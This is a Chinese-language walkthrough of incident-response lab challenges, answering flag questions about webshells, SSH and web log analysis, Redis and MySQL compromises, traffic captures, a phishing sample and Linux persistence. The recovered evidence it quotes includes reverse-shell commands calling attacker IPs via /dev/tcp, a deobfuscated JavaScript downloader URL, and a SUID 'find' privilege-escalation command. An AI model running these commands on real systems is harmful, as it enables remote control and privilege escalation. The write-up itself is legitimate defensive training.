前言：

感谢玄机平台靶机的提供，让我学到了不少东西

平台题解 ：

第一章 应急响应-webshell查杀

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

ssh连接 下载/var/www/html源码（finsehll连直接下）压缩丢到河马沙箱在线查杀

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2.黑客使用的什么工具的shell github地址的md5 flag{md5}

BeichenDream/Godzilla: 哥斯拉 (github.com)

flag{39392DE3218C333F794BEFEF07AC9257}

3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

/var/www/html/include/Db/.Mysqli.php

 4.黑客免杀马完整路径 md5 flag{md5}

/var/www/html/wap/top.php

第二章 日志分析-apache日志分析 

1、提交当天访问次数最多的IP，即黑客IP：

cut -d- -f 1 access.log.1|uniq -c | sort -rn | head -20

192.168.200.2

2、黑客使用的浏览器指纹是什么，提交指纹的md5：

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

3、查看index.php页面被访问的次数，提交次数：

cat access.log.1 | grep "/index.php" | wc -l

4、查看黑客IP访问了多少次，提交次数：

5、查看2023年8月03日8时这一个小时内有多少IP访问，提交次数:

第一章 应急响应-Linux日志分析

1.有多少IP在爆破主机ssh的root帐号，如果有多个使用","分割

cat /var/log/auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr | more

flag{192.168.200.2,192.168.200.31,192.168.200.32}

2.ssh爆破成功登陆的IP是多少，如果有多个使用","分割

cat /var/log/auth.log.1 | grep -a "Accepted" | awk '{print $11}' | sort | uniq -c | sort -nr | more 

flag{192.168.200.2}

3.爆破用户名字典是什么？如果有多个使用","分割

grep -a "Failed password" /var/log/auth.log.1 |perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}' | sort | uniq -c | sort -nr | more 

flag{user,hello,root,test3,test2,test1}

4.登陆成功的IP共爆破了多少次

grep -a "Failed password for root" /var/log/auth.log.1 | awk '{print $11}' | uniq -c | sort -nr | more
grep -a "Accepted " /var/log/auth.log.1 | awk '{print $11}' | uniq -c | sort -nr | more

5.黑客登陆主机后新建了一个后门用户，用户名是多少

cat /var/log/auth.log.1 |grep -a "new user"
cat /etc/passwd

 flag{test2}

第一章 应急响应- Linux入侵排查

1.web目录存在木马，请找到木马的密码提交

下载网页源码进行查杀

flag{1}

2.服务器疑似存在不死马，请找到不死马的密码提交

5d41402abc4b2a76b9719d911017c592hello

3.不死马是通过哪个文件生成的，请提交文件名

flag{index.php}

4.黑客留下了木马文件，请找出黑客的服务器ip提交

10.11.55.21

5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交

执行shell(1).elf
netstat -antlp| grep 10.11.55.21

3333

第二章 日志分析-mysql应急响应 

1.黑客第一次写入的shell flag{关键字符串}

下载网站源码放到河马查杀

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

2.黑客反弹shell的ip flag{ip}

192.168.100.13:771

 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

得到数据库账号密码 

root334cc35b3c704593

ubuntu下mysql5.7用udf提权或getshell踩坑——解决udf无法执行命令 - 5gstudent - 博客园 (cnblogs.com)

登入然后

show variables like '%plugin%';

查看MySQL中已加载的插件以及相关配置信息

         访问/usr/lib/mysql/plugin/

/usr/lib/mysql/plugin/udf.so
flag{b1818bde4e310f3d23f1005185b973e7}

4.黑客获取的权限 flag{whoami后的值}

mysql 服务为mysql用户启动 

 flag{mysql}

第二章 日志分析-redis应急响应 

1.通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少

192.168.100.13出现次数较多明显是爆破
192.168.100.20是主从复制
flag{192.168.100.20}

2.通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;

看到加载system，即上传exp.so

flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}

3.通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;

crontab -l

/bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1

4.通过本地 PC SSH到服务器并且溯源分析黑客的用户名，并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交 

发现keys

 

flag{xj-test-user-wow-you-find-flag}

5.通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交

cd /usr/bin
/usr/bin 存放所有用户都可用的应用程序
ls -al
cat ps

flag{c195i2923381905517d818e313792d196}

第六章 流量特征分析-蚁剑流量分析

1.木马的连接密码是多少

1

2.黑客执行的第一个命令是什么

右键编码“Value”位置，点击“分组字节流”，开始位置调整为“2”，解码为调整为“Base64”，查看流量包执行的命令内容，得到第一个执行的命令 "id"

id

3.黑客读取了哪个文件的内容，提交文件绝对路径

flag{/etc/passwd}

4.黑客上传了什么文件到服务器，提交文件名

点击第4个请求包，右键编码“Value”位置，位置，点击“分组字节流”，开始位置调整为“2”，解码为调整为“Base64”，查看流量包执行的命令内容，得到黑客上传文件名 "flag.txt"

flag{flag.txt}

5.黑客上传的文件内容是什么

点击第4个请求包，右键“追踪流”->“HTTP流”，将编码复制，进行url解码

最后一段编码明显是Base64编码（解码后就是上传文件的绝对路径），猜测第二段编码为文件内容（蚁剑上传的文件会对内容进行16进制加密），进行解密得到文件内容 "flag{write_flag}"

flag{write_flag}

6.黑客下载了哪个文件，提交文件绝对路径

点击第6个请求包，右键编码“Value”位置，位置，点击“分组字节流”，开始位置调整为“2”，解码为调整为“Base64”，查看流量包执行的命令内容，得到黑客下在的文件名 "config.php"

flag{/var/www/html/config.php}

第五章 linux实战-CMS01 

知攻善防应急靶场-Linux(2)-CSDN博客

第四章 windows实战-emlog

知攻善防应急靶场-Windows（Web1-2-3）-CSDN博客

第六章 流量特征分析-waf 上的截获

1.黑客成功登录系统的密码 flag{xxxxxxxxxxxxxxx}

admin!@#pass123

2.黑客发现的关键字符串 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

flag{87b7cb79481f317bde90c116cf36084b}

3.黑客找到的数据库密码 flag{xxxxxxxxxxxxxxxx}

第六章 流量特征分析-常见攻击事件 tomcat 

 1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP  flag格式：flag{ip}，如：flag{127.0.0.1}

flag{14.0.0.120}

2.找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}

flag{guangzhou}

3.哪一个端口提供对web服务器管理面板的访问？ flag格式：flag{2222}

4.经过前面对攻击者行为的分析后,攻击者运用的工具是？ flag格式：flag{名称}

gobuster扫描神器 

5.攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码？ flag格式：flag{root-123}

我们发现HTTP Authorization 请求标头用于提供服务器验证用户代理身份的凭据，允许访问受保护的资源。

flag{admin-tomcat}

6.攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称？ flag格式：

http.request.method==POST //上传就是POST设置过滤器

form-data;name="deployWar";filename="JXQOZY.war"

7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息？ flag提示,某种任务里的信息

随意访问外网的数据包 发现定时任务

flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}

第六章 流量特征分析-小王公司收到的钓鱼邮件 

1.下载数据包文件 hacker1.pacapng，分析恶意程序访问了内嵌 URL 获取了 zip 压缩包，该 URL 是什么将该 URL作为 FLAG 提交 FLAG（形式：flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}） (无需 http、https)；

http://tsdandassociates.co.sz/w0ks//?YO=1702920835 

2.下载数据包文件 hacker1.pacapng，分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG（形式：flag{md5}）；

导出对象-http另存为1.zip  使用windows自带md5加密

certutil -hashfile 1.zip MD5//f17dc5b1c30c512137e62993d1df9b2f

3.下载数据包文件 hacker1.pacapng，分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序， 该域名是什么?提交答案:flag{域名}(无需 http、https)

我们从流量包中保存的zip文件，解压后发现Nuj.js有字符串拼接的代码

其中一段如下：

o457607380 = '';
o457607380+='h';
o457607380+='t';
o457607380+='t';
o457607380+='p';
o457607380+='s';
o457607380+=':';
o457607380+='/';
o457607380+='/';
o457607380+='s';
o457607380+='h';
o457607380+='a';
o457607380+='k';
o457607380+='y';
o457607380+='a';
o457607380+='s';
o457607380+='t';
o457607380+='a';
o457607380+='t';
o457607380+='u';
o457607380+='e';
o457607380+='s';
o457607380+='t';
o457607380+='r';
o457607380+='a';
o457607380+='d';
o457607380+='e';
o457607380+='.';
o457607380+='c';
o457607380+='o';
o457607380+='m';
o457607380+='/';
o457607380+='A';
o457607380+='6';
o457607380+='F';
o457607380+='/';
o457607380+='6';
o457607380+='1';
o457607380+='6';
o457607380+='2';
o457607380+='3';
o457607380+='1';
o457607380+='6';
o457607380+='0';
o457607380+='3';
l988241708 = '';
l988241708+='q';
l988241708+='u';
l988241708+='i';
l988241708+='.';
l988241708+='q';

即：https://shakyastatuestrade.com/A6F/616231603 得到域名

flag{shakyastatuestrade.com}

第七章 常见攻击事件分析--钓鱼邮件 

1.请分析获取黑客发送钓鱼邮件时使用的IP，flag格式： flag{11.22.33.44}

邮件在传输过程中会经过多个邮件服务器，每个邮件服务器都会向邮件头部的 "Received" 部分添加一条记录。因此，查看最后一个 "Received" 部分的IP地址可以更准确地找到邮件的真实发件IP地址

flag{121.204.224.15}

2.请分析获取黑客钓鱼邮件中使用的木马程序的控制端IP，flag格式：flag{11.22.33.44}

在线云查杀就能直接看到ip 安恒云沙箱

3.黑客在被控服务器上创建了webshell，请分析获取webshell的文件名，请使用完整文件格式，flag格式：flag{/var/www/html/shell.php

网站文件直接丢在线websehll查杀就能发现

flag{/var/www/html/admin/ebak/ReData.php}

4.黑客在被控服务器上创建了内网代理隐蔽通信隧道，请分析获取该隧道程序的文件名，请使用完整文件路径，flag格式：flag{/opt/apache2/shell}

为网络代理的配置文件，所以猜测同目录下的文件mysql就是黑客搭建的隧道工具

flag{/var/tmp/proc/mysql}

第三章 权限维持-linux权限维持-隐藏 

1.黑客隐藏的隐藏的文件 完整路径md5

在/tmp/.temp/文件夹下发现libprocesshider,libprocesshider是用于隐藏文件的项目

打开 /tmp/.temp/libprocesshider/processhider.c

发现隐藏了1.py

/tmp/.temp/libprocesshider/1.py

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

打开1.py

flag{114.114.114.121:9999}

3.黑客提权所用的命令 完整路径的md5 flag{md5}

 查找有suid属性权限的文件

find / -perm -u=s -type f 2>/dev/null

  find拥有suid权限位，尝试以find命令执行whoami

 

find `which find` -exec whoami \;

 

/usr/bin/find

4. 黑客尝试注入恶意代码的工具完整路径md5

cymothoa是后门工具

黑客(红队)攻防中cymothoa后门的利用 | CN-SEC 中文网

/opt/.cymothoa-1-beta/cymothoa

 5.使用命令运行 ./x.xx 执行该文件  将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

ibprocesshider隐藏了/tmp/.temp/libprocesshider/1.py，清除/etc/ld.so.preload之后可以看到启动命令

ps -auxef | grep 1.py

题目问1.py的启动命令的可执行程序是什么,那么就是Python3，ls /usr/bin/python3 -al 看下软连接

ls /usr/bin/python3 -al
which python3.4

flag{/usr/bin/python3.4}

后记：

后面接着干，持续更新 ，一起学习！！！！